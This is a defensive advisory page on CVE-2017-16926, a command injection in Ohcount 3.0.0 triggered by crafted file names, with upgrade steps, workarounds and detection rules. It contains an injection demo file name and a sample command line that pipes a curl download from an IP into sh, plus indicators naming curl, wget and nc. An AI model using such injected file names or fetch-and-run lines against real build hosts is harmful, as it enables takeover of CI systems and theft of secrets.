CVE-2017-16926

9.8 CRITICAL

📋 TL;DR

CVE-2017-16926 is a command injection vulnerability in Ohcount 3.0.0. Ohcount builds a shell command that contains the name of the file it is inspecting, so a file whose name carries shell metacharacters (for example `;`, backticks or `$( )`) breaks out of that command and runs attacker-chosen commands with Ohcount's privileges as soon as the tree is scanned. Anyone who runs Ohcount 3.0.0 over untrusted source trees (CI/CD jobs, hosted code-analysis services) is exposed, up to full compromise of the scanning host.

💻 Affected Systems

Products:
  • Ohcount
Versions: 3.0.0
Operating Systems: Linux, Unix-like systems
Default Config Vulnerable: ⚠️ Yes
Notes: Vulnerable when processing untrusted source trees. Ohcount is often used in development tools, CI/CD pipelines, and code analysis systems.

📦 What is this software?

Ohcount is a command-line source code line counter, originally written for the Ohloh (now Open Hub) project. It detects the language of each file in a source tree and reports code, comment and blank line counts per language. It is written mostly in C and is packaged by Debian and Ubuntu, which is how it ends up on build and analysis hosts.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full compromise of the scanning host: arbitrary code execution as the user running Ohcount, followed by privilege escalation, theft of source and secrets, or complete takeover of the system.

🟠

Likely Case

Arbitrary command execution on the CI runner or analysis host that scans the malicious tree, with the privileges of the Ohcount process: theft of the credentials and secrets available to that job, tampering with build artefacts, or installation of a backdoor on the host.

🟢

If Mitigated

Limited impact if Ohcount runs with minimal privileges, processes only trusted source trees, or is isolated in containers.

🌐 Internet-Facing: MEDIUM - Ohcount is typically used for code analysis and not directly internet-facing, but could be exposed via web interfaces or CI/CD pipelines.
🏢 Internal Only: HIGH - If used in development environments or CI/CD systems processing untrusted code, the risk is significant.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The attacker only needs to get a file with a crafted name into a tree that Ohcount will scan, for example by committing it to a repository that a CI job or hosted code-analysis service counts; no account on the host running Ohcount is required. The bug and its trigger are documented in the Debian bug report (https://bugs.debian.org/882372).
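The pattern behind this class of bug, shown as an added example written for this page in Python (illustrative code, not Ohcount's C source): a helper that pastes the file name into one shell command string, beside the same call made without a shell and the same call with proper quoting. `echo` stands in for the external tool so the demo runs anywhere, and the file name `x'; echo INJECTED; '` and the allow-list regex are constructed for the demonstration.

```python
import re
import shlex
import subprocess

# Constructed file name for the demonstration: the quote closes the quoted
# argument, and everything after it is parsed by the shell as a new command.
MALICIOUS_NAME = "x'; echo INJECTED; '"

# Conservative allow-list for defence in depth (assumed; extend as needed).
SAFE_NAME = re.compile(r"^[A-Za-z0-9._/-]+$")


def probe_with_shell(tool: list[str], path: str) -> str:
    """Vulnerable pattern: build one command line and hand it to /bin/sh.

    Wrapping the name in single quotes is not enough, because a quote inside
    the name ends the quoted region. Returns the child's stdout.
    """
    cmd = " ".join(tool) + f" '{path}'"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def probe_without_shell(tool: list[str], path: str) -> str:
    """Hardened pattern: argv list, no shell. The path is exactly one argument
    however many metacharacters it contains."""
    proc = subprocess.run([*tool, path], capture_output=True, text=True)
    return proc.stdout


def probe_with_quoting(tool: list[str], path: str) -> str:
    """Also safe when a shell is unavoidable: shlex.quote() re-quotes embedded
    quotes so the shell sees a single word."""
    cmd = " ".join(tool) + " " + shlex.quote(path)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def is_safe_name(name: str) -> bool:
    """Allow-list check to run over every path before scanning an untrusted tree."""
    return SAFE_NAME.fullmatch(name) is not None


if __name__ == "__main__":
    # 'echo' stands in for the real helper; a real tool would be e.g. ["file", "-b", "--"].
    print("shell  :", repr(probe_with_shell(["echo"], MALICIOUS_NAME)))
    print("argv   :", repr(probe_without_shell(["echo"], MALICIOUS_NAME)))
    print("quoted :", repr(probe_with_quoting(["echo"], MALICIOUS_NAME)))
    print("allowed:", is_safe_name(MALICIOUS_NAME), is_safe_name("src/main.c"))
```

Run it and compare the three outputs: the shell variant prints `x` and then `INJECTED` on its own line, because the injected `echo` ran as a second command; the argv and quoted variants print the whole name literally on one line. The allow-list is a second line of defence for the case where the scanner cannot be patched.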

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.0.0 or later (see the Debian bug report for the exact package revision that carries the fix)

Vendor Advisory: https://bugs.debian.org/882372

Restart Required: No

Instructions:

1. Upgrade Ohcount to 4.0.0 or later (the Debian bug report names the package revision that carries the fix).
2. On Debian/Ubuntu: sudo apt update && sudo apt install --only-upgrade ohcount
3. Confirm the installed version with dpkg -s ohcount | grep '^Version' (or ohcount --version, if your build accepts it), then rescan a known-good tree to confirm Ohcount still works.

🔧 Temporary Workarounds

Input Sanitization

linux

Before running Ohcount, refuse any tree that contains a file or directory name with characters outside a conservative allow-list. Do not strip the characters in place: renaming silently changes the tree and can make two names collide. find's -name pattern is a plain glob, so the character class is spelled out; \w and \d are not understood there, and -delete would destroy the files you are trying to inspect.

LC_ALL=C find /path/to/source -name '*[!A-Za-z0-9._-]*' -print
# Fail closed in a CI step: stop before Ohcount sees an unsafe name
if [ -n "$(LC_ALL=C find /path/to/source -name '*[!A-Za-z0-9._-]*' -print -quit)" ]; then
  echo "refusing to scan: unsafe file names present" >&2
  exit 1
fi
ohcount /path/to/source

Extend the allow-list if your trees legitimately use other characters (for example + in c++ directories), but keep every shell metacharacter out of it.

Container Isolation

linux

Run Ohcount in a container with no network, a read-only bind mount of the tree and an unprivileged user. This does not stop the injected command from running; it limits what that command can reach. The image name ohcount-local is a placeholder for an image you build from your Ohcount package.

docker run --rm --network none --read-only --tmpfs /tmp --cap-drop ALL \
  --user 65534:65534 -v "$(pwd)":/src:ro ohcount-local ohcount /src

🧯 If You Can't Patch

  • Run Ohcount with minimal privileges using a dedicated low-privilege user account
  • Only process trusted source trees and implement strict input validation for filenames

🔍 How to Verify

Check if Vulnerable:

Ohcount 3.0.0 is the affected release. Confirm the installed version through the package manager (dpkg -s ohcount | grep '^Version' on Debian/Ubuntu; the ohcount binary itself may not accept --version). Then ask whether that installation ever scans trees an outside party can add files to, such as CI checkouts of third-party pull requests or uploaded archives; if it does not, exposure is limited.

Check Version:

ohcount --version
dpkg -s ohcount | grep '^Version'

Verify Fix Applied:

Confirm the installed version is 4.0.0 or later (dpkg -s ohcount | grep '^Version', or ohcount --version if your build accepts it), then scan a known-good tree to confirm Ohcount still produces counts.

📡 Detection & Monitoring

Log Indicators:

  • A shell spawned by ohcount whose command line contains shell metacharacters (;, |, backticks, $( )) or commands beyond the single helper Ohcount normally runs on a file
  • Programs such as curl, wget, nc, or an interactive shell started as descendants of an ohcount process

Network Indicators:

  • Unexpected outbound connections from Ohcount processes
  • Data exfiltration patterns

SIEM Query:

parent_process_name:"ohcount" AND process_name:("sh" OR "dash" OR "bash") AND command_line:(*";"* OR *"|"* OR *"`"* OR *"$("*)

Field names follow common EDR schemas; adapt them to your platform. Because the injection works by making Ohcount's own shell command do more than intended, key the query on the parent/child relationship and on the extra metacharacters, not on the ohcount command line itself, which is usually just a directory path.
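The log indicators above turned into running detection logic, as an added example written for this page in Python (not from any vendor or from the Ohcount project). It walks a batch of process-creation events, finds every process that descends from ohcount, and flags shells whose command line does not match the one helper command Ohcount is expected to run, plus any other unexpected descendant. The event records are constructed for the example, the field names (`pid`, `ppid`, `name`, `cmdline`) are placeholders for your EDR schema, and the expected-helper pattern assumes Ohcount probes files with `sh -c "file -b '<path>'"`; adjust `EXPECTED_SHELL_CMD` to what your build actually spawns.

```python
import re
from dataclasses import dataclass

# Assumption: Ohcount's only legitimate shell child is a probe of this shape.
# Tune this to the command line your build actually spawns.
EXPECTED_SHELL_CMD = re.compile(r"^(?:/bin/)?(?:sh|dash|bash) -c file -b '([^']*)'$")
METACHARS = re.compile(r"[;|&`$<>()]")
SHELLS = {"sh", "dash", "bash"}
ALLOWED_HELPERS = {"file"}


@dataclass(frozen=True)
class Alert:
    pid: int
    reason: str


# Constructed process-creation events, oldest first. Field names are
# placeholders for whatever your EDR exports.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "name": "ohcount", "cmdline": "ohcount /srv/ci/checkout"},
    {"pid": 101, "ppid": 100, "name": "sh",   "cmdline": "sh -c file -b '/srv/ci/checkout/main.c'"},
    {"pid": 102, "ppid": 101, "name": "file", "cmdline": "file -b /srv/ci/checkout/main.c"},
    {"pid": 103, "ppid": 100, "name": "sh",
     "cmdline": "sh -c file -b '/srv/ci/checkout/x'; curl http://203.0.113.5/p | sh; ''"},
    {"pid": 104, "ppid": 103, "name": "curl", "cmdline": "curl http://203.0.113.5/p"},
    {"pid": 105, "ppid": 103, "name": "sh",   "cmdline": "sh"},
    {"pid": 200, "ppid": 1,   "name": "sh",   "cmdline": "sh -c ls; id"},  # not under ohcount
]


def descends_from_ohcount(pid: int, by_pid: dict) -> bool:
    """Walk the ppid chain; True if any ancestor is an ohcount process."""
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        parent = by_pid.get(cur["ppid"])
        if parent is not None and parent["name"] == "ohcount":
            return True
        cur = parent
    return False


def detect(events: list) -> list:
    """Return one Alert per suspicious descendant of ohcount, in event order."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if e["name"] == "ohcount" or not descends_from_ohcount(e["pid"], by_pid):
            continue
        if e["name"] in SHELLS:
            # The legitimate probe matches exactly; anything appended after the
            # quoted path, or metacharacters inside it, is the injection.
            m = EXPECTED_SHELL_CMD.match(e["cmdline"])
            if m is None or METACHARS.search(m.group(1)):
                alerts.append(Alert(e["pid"], "shell under ohcount with unexpected command line"))
        elif e["name"] not in ALLOWED_HELPERS:
            alerts.append(Alert(e["pid"], f"unexpected program {e['name']} under ohcount"))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a.pid, a.reason)
```

On the sample batch the benign probe (pid 101) and its `file` child (102) pass, while the injected shell (103), the `curl` it launched (104) and the second shell it piped into (105) are each reported; the unrelated shell with pid 200 is ignored because nothing above it is ohcount. The parent-chain walk is what keeps the rule precise: the same `curl` under a developer's terminal would not fire.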

🔗 References

  • Debian bug #882372 (CVE-2017-16926): https://bugs.debian.org/882372
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2017-16926